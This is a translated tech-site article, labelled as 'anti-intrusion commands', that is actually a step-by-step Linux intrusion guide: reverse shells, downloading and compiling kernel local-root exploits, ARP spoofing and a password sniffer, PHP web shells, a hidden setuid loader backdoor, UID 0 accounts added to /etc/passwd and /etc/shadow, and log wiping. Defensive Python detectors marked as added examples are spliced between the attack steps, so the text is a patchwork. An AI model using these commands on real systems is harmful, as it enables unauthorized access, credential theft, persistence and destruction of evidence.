2025-01-16 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article is about anti-intrusion commands in Linux. The editor finds them quite practical and is sharing them here for everyone to study; hopefully you will gain something from reading it. Without further ado, let's take a look.
Linux is a free-to-use, freely distributed UNIX-like operating system. It is a POSIX-based multi-user, multitasking, multi-threaded, multi-CPU operating system that runs the major Unix tools, applications and network protocols.
1. On Linux, think of cross-site access first
If the shell cannot browse the target site, enter on the command line:
ls -la /www.users/
2. Privilege escalation via overflow
# python -c 'import pty;pty.spawn("/bin/sh");'
This gives an interactive shell; most systems install python by default.
Enter id:
bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
Here uid=529(zeicom) is not root.
Enter uname -r
Returns: 2.6.18-164.11.1.el5PAE
Linux privilege escalation can be roughly divided into third-party software vulnerabilities, native trust features, and kernel overflows.
Find the corresponding exp. The collections at the following addresses are very complete, and it can be downloaded from there:
http://tools.90sec.org/
http://sebug.net/paper/linux_exp/
http://x73.cc/bitch/exp/
http://www.exploit-db.com/search/
Enter the command pwd, which displays the current directory.
Check whether compiling is possible: gcc --help
The current directory is the directory the shell is in. I uploaded 2.c through the shell.
Bounce a shell to port 12345 of your own machine.
Listen locally on an external-network server: nc -lvvp 12345
Usually you get an interactive shell as apache, but sometimes you don't.
In that case:
# python -c 'import pty;pty.spawn("/bin/sh");'
cd /tmp    Go to the tmp directory
mkdir Papers    Create a directory named Papers; Papers is inconspicuous
cd Papers    Go to the Papers directory
pwd    View the current directory
Then enter wget to download the exp
gcc -o 2 2.c    //Compile 2.c into an executable file
g++ keio.cc -o keio
chmod +x 2    //Give 2 execute permission
./2    //Run 2, overflow
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
To compile arpsniffer.c you need to install pcap and libnet first.
rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0
tar zxvf libpcap-0.8.1.tar.gz
cd libpcap-0.8.1
./configure
make
make install
Recompile arpsniffer.c:
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
This time there was no error, the compilation was successful.
./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254
Now start the spoofing. Since the target is a server, we spoof the gateway (the network environment is as follows: mail server IP 192.168.0.11, gateway 192.168.0.1, local machine 192.168.0.77):
./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
Listen with tcpdump in another login session:
tcpdump -i eth0 host 192.168.0.11
Data was found; save the captured data to a file:
tcpdump -i eth0 host 172.16.0.12 -w pop.txt
Stop after 10 minutes, download pop.txt to the local machine with the sz command in SecureCRT, and analyze it with Ethereal.
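Seen from the defending side, the gateway spoofing above shows up in the neighbor table of the targeted host: the gateway IP resolves to the MAC of the spoofing machine, so two IPs share one MAC. The following is an added example, not part of the original article, that checks /proc/net/arp-format text for this; the MAC addresses and the pinned gateway MAC are constructed values.

```python
"""Flag ARP-cache signs of gateway spoofing in /proc/net/arp-format text."""
from collections import defaultdict

# Constructed sample: neighbor table on the mail server (192.168.0.11) while
# 192.168.0.77 answers for the gateway 192.168.0.1. MAC addresses are made up.
SAMPLE_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.0.1      0x1         0x2         00:0c:29:aa:bb:77     *        eth0
192.168.0.77     0x1         0x2         00:0c:29:aa:bb:77     *        eth0
192.168.0.4      0x1         0x2         00:0c:29:11:22:04     *        eth0
192.168.0.9      0x1         0x0         00:00:00:00:00:00     *        eth0
"""


def parse_arp(text):
    """Return {ip: mac} for complete entries (flag bit 0x2 = ATF_COM)."""
    table = {}
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, _hw_type, flags, mac = fields[:4]
        if int(flags, 16) & 0x2:
            table[ip] = mac.lower()
    return table


def find_spoofing(text, pinned=None):
    """Return findings: one MAC claimed by several IPs, pinned-MAC mismatches."""
    table = parse_arp(text)
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    findings = []
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(("shared-mac", mac, sorted(ips)))
    for ip, expected in sorted((pinned or {}).items()):
        seen = table.get(ip)
        if seen and seen != expected.lower():
            findings.append(("gateway-changed", ip, seen))
    return findings


if __name__ == "__main__":
    # Assumed known-good gateway MAC recorded beforehand (constructed value).
    for finding in find_spoofing(SAMPLE_ARP, {"192.168.0.1": "00:0c:29:00:00:01"}):
        print(finding)
```

On a live host, pass the contents of /proc/net/arp instead of SAMPLE_ARP.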
Now we can use linsniffer to capture the usernames and passwords we want.
First modify linsniffer.c so that it listens for the passwords of the applications you need. Mine is as follows:
if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/
if(ntohs(tcp->dest)==23) p=1; /* telnet */
if(ntohs(tcp->dest)==80) p=1; /* http */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
[root@bbs111 root]# gcc -o linsniffer linsniffer.c
In file included from /usr/include/linux/tcp.h:21,
from linsniffer.c:32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include instead!
Ignore the warning and just run the compiled linsniffer.
[root@bbs111 root]# ./linsniffer
The usernames and passwords are automatically saved to tcp.log.
3. Using cross-site code
Code for cross-directory access on Linux without privilege escalation
Linux permissions are in fact often set quite loosely, but some virtual hosts still do not allow cross-directory access.
If privilege escalation fails, try the following code. With luck, it may get across.
The code is as follows:
<?php
$path = stripslashes($_GET['path']);
$ok = chmod($path, 0777);
if ($ok == true)
echo "CHMOD OK , Permission editable file or directory. Permission to write";
?>
Save the above code as tmdsb.php
Then visit www.tmdsb.com/tmdsb.php?path=../../…/index.php
Here index.php is the file whose permissions are to be changed.
Another exp collected:
Save the following code as exp.php
Code:
<?php
@$filename = stripslashes($_POST['filename']);
@$mess = stripslashes($_POST['mess']);
$fp = @fopen("{$_POST['filename']}", 'a');
@fputs($fp, $mess);
@fclose($fp);
?>
4. 2.6.18: finally, Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)
This 0day overflow succeeded.
udev privilege escalation
I switched to a udev privilege escalation exp, which applies to kernels in the 2.6.* range.
As before, upload the files to the directory on the server where the shell is, run ls, and see that the files are already there; then give the exp execute permission.
chmod +x pwnkernel.c
chmod +x wunderbar_emporium.sh
chmod +x exploit.c
Then run the overflow: ./w*
The overflow succeeds, with root permission.
Next comes leaving a backdoor~ I don't mind adding a user with root privileges either... (useradd -u 0 -o "username")
Enter the commands in turn:
cd /tmp
sh-3.1# ls /lib/ld-linux*
/lib/ld-linux.so.2
sh-3.1# cp /lib/ld-linux.so.2 /tmp/.str1ven
sh-3.1# ls -l .str1ven
-rwxr-xr-x 1 root root 121684 07-08 21:13 .str1ven
sh-3.1# chmod +s .str1ven
sh-3.1# ls -l .str1ven
-rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven
The backdoor is set up successfully. Exit root, run ./.str1ven `which whoami`, and root permission is obtained again~~
cat /etc/passwd    View Linux users
cat /etc/shadow    View user passwords; requires root permission
cat /etc/sysconfig/network-scripts/ifcfg-ethn    N stands for the NIC number; view the IP information of that NIC
ifconfig    View the local IP information
cat /etc/resolv.conf    View DNS information
bash -i    Used in a bounced shell, it displays commands clearly
bash prompt: when you come in as an ordinary restricted user, you generally have a prompt like bash$. When you log in as root, your prompt becomes bash#.
System variables: try echo "$USER / $EUID"; the system should tell you which user it thinks you are.
echo 1>/proc/sys/net/ipv4/ip_forward
netstat -an |grep LISTEN |grep :80 View port
service --status-all | grep running
service --status-all | grep http
View running services
lsb_release -a View system version
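The .str1ven backdoor above is a root-owned setuid copy of the dynamic loader placed in /tmp, which is exactly what a periodic setuid sweep of world-writable directories finds. The following is an added example, not part of the original article; the directory list and the loader paths in the demo are assumptions.

```python
"""Look for setuid/setgid files in world-writable locations such as /tmp."""
import hashlib
import os
import stat

# Assumed list of directories any local user can write to.
DEFAULT_ROOTS = ("/tmp", "/var/tmp", "/dev/shm")


def sha256_of(path):
    """Hash a file in chunks so large binaries are not loaded whole."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_suid(roots=DEFAULT_ROOTS):
    """Return sorted (path, mode, uid, hidden) for setuid/setgid regular files."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: never follow symlinks
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    hits.append((path, stat.filemode(st.st_mode), st.st_uid,
                                 name.startswith(".")))
    return sorted(hits)


def is_copy_of(path, originals):
    """True if path is byte-identical to any readable file in originals."""
    wanted = sha256_of(path)
    for original in originals:
        try:
            if sha256_of(original) == wanted:
                return True
        except OSError:
            continue
    return False


if __name__ == "__main__":
    loaders = ["/lib/ld-linux.so.2", "/lib64/ld-linux-x86-64.so.2"]  # assumed paths
    for path, mode, uid, hidden in find_suid():
        print(mode, uid, path, "hidden" if hidden else "",
              "LOADER COPY" if is_copy_of(path, loaders) else "")
```

Mounting /tmp, /var/tmp and /dev/shm with the nosuid option makes the kernel ignore the setuid bit on files there.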
Restart the SSH service:
/usr/sbin/sshd stop
/usr/sbin/sshd start
In the sshd_config file, find PasswordAuthentication no,
change it to
PasswordAuthentication yes
This is required before you can log in over remote SSH; otherwise you get:
Access denied.
UsePAM yes may be needed to establish PAM logins, for example when connecting by ssh from another Linux host to the server; if it is turned off, the login cannot be established.
The rookie way to use su
chmod 777 /etc/passwd
Then change the bin user's gid and uid to 0
Then set bin's password with passwd
Then cp /bin/bash /sbin/nologin
After that, su - bin gives a root shell.
The principle: this is a very crude approach for when sshd does not allow root to log in over an SSH terminal and we do not know the root password.
It can also be done like this:
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c -o local -static -Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
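The account changes described above (extra UID 0 accounts, a password set on bin, an empty password field in /etc/shadow, /sbin/nologin overwritten with bash) all leave traces that an audit can check for. The following is an added example, not part of the original article; the sample passwd and shadow lines, the hash placeholders and the SERVICE_ACCOUNTS list are constructed.

```python
"""Audit passwd/shadow text for the account tampering described above."""
import filecmp

# Assumed set of service accounts that should never have a usable password.
SERVICE_ACCOUNTS = {"bin", "daemon", "adm", "lp", "mail", "nobody", "apache"}

# Constructed samples modelled on the changes in the article.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:0:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
zeicom:x:529:525::/home/zeicom:/bin/bash
nosec:x:0:0::/:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$1$CONSTRUCTED$placeholder1:14000:0:99999:7:::
bin:$1$CONSTRUCTED$placeholder2:14800:0:99999:7:::
daemon:*:14000:0:99999:7:::
zeicom:$1$CONSTRUCTED$placeholder3:14500:0:99999:7:::
nosec::-1:-1:-1:-1:-1:-1:500
"""


def audit_accounts(passwd_text, shadow_text):
    """Return (finding, account) tuples in file order, passwd first."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2] == "0" and fields[0] != "root":
            findings.append(("uid0", fields[0]))
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        name, password = fields[0], fields[1]
        if password == "":
            findings.append(("empty-password", name))
        elif name in SERVICE_ACCOUNTS and password[0] not in "*!":
            findings.append(("service-password", name))
    return findings


def nologin_is_shell(nologin="/sbin/nologin", shells=("/bin/bash", "/bin/sh")):
    """True if nologin is byte-identical to a real shell (cp /bin/bash over it)."""
    for shell in shells:
        try:
            if filecmp.cmp(nologin, shell, shallow=False):
                return True
        except OSError:
            continue
    return False


if __name__ == "__main__":
    print(audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW), nologin_is_shell())
```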
/dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10    Creates a large 100M file on Linux